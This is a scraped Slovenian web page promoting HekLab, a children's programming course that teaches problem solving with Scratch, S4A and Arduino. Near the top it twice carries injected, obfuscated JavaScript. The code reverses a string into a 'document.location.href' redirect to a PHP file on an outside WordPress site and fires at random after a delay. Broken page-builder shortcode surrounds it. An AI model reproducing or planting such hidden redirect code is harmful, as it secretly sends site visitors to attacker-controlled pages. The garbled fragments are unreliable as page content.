Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” disabled=”off”]

HekLab programiranje

 

HekLab je laboratorij za programiranje (»hekanje«). V njem povezujemo programiranje z vsem, kjer nam pride prav. V bistvu se učimo analitičnega in logičnega mišljenja, ki je podlaga programiranja. To počnemo preko reševanja problemov.

V HekLabu najprej poiščemo probleme, ki se otrokom zdijo zanimivi. Nato jih razstavimo na manjše delčke, za njih iščemo rešitve (v programski jezikih) in na koncu te delne rešitve sestavimo v celoto (npr. program za računanje, animacijo ali igrico). Problem, njegovo reševanje in programiranje nam lahko vzame en termin, en teden ali tri mesece.

Spreten.si s HekLabom rešuje problem, da otroci veliko uporabljajo tehnologije, nimajo pa znanja, da bi uporabljano spreminjali po svoje (hekali) in v prihodnosti soustvarjali nove tehnologije.

V HekLabu otroke peljemo do naslednjih življenjskih spoznanj:

  • z analitičnim in algoritemskim oz. računalniškim načinom razmišljanja lahko rešimo marsikateri problem v življenju;
  • programiranje je izražanje tega, kar smo predtem domislili in je zadnji del miselnega procesa reševanja problemov;
  • večina tehnologij temelji na programskih jezikih, ki se jih lahko naučimo brati, spreminjati in ustvarjati;

Pri tem se otroci učijo naslednje tehnične spretnosti:

  • programiranje v več jezikih (Scratch, S4A);
  • vizualizacija in analiza problemov in sinteza rešitev;
  • povezovanje programov in računalnika z drugimi napravami (npr. arduino);